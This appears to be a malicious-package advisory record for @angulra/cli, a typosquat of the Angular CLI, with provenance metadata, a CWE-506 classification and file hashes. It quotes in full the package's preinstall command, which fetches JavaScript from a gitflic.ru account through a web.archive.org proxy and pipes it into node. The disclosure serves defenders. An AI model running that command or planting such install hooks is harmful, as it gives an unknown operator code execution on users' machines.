-= Per source details. Do not edit below this line.=-
The package name @angulra/cli is a character-swap of @angular/cli and copies the legitimate Angular CLI's metadata (description, repository, homepage, keywords, dependencies). Its package.json defines a preinstall script that runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, fetching JavaScript from an anonymous third-party account (hellscripter) on gitflic.ru via a web.archive.org proxy and piping the response directly into Node. The URL is unpinned, has no integrity check, is unrelated to the Angular publisher, and the fetched bytes execute automatically on npm install, giving the operator of that endpoint arbitrary code execution on the installer's machine. src/analytics/analytics-collector.js additionally issues outbound POSTs via https.request alongside ping-style activity.
{
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-020908",
"import_time": "2026-10-04T23:40:40.859812447Z",
"modified_time": "2026-10-04T23:17:56Z",
"sha256": "e3158beab2ea0d9f8e28d488f124268c8c9a00a3a0f5599823c4d13f741ac40f",
"source": "amazon-inspector",
"versions": [
"22.2.1"
]
}
]
}[
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
]
{
"evidence_files": [
{
"path": "package.json",
"sha256": "93fc68be8a38359d182dcb8461d07d1e3ee1be5279c86994454ebfa1648c03ec",
"tlsh": "22313576dae01d6316d9128498360903743c962b0e06fa78f799540c4f8f69f2277aae"
}
],
"package_integrity": [
{
"filename": "cli-22.2.1.tgz",
"hashes": {
"sha1": "ac4bc353e3455283ccdaa5244c0b42f194a39184",
"sha512_sri": "sha512-jHLGtdMxaMiY7mLzplndIna+fojgWUeQM0y8Se9RqAZ2igcChOOG4J80fzLZgsEIqAu3VsOFSqR233fnk2VM9A=="
}
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@angulra/cli/MAL-2026-17495.json"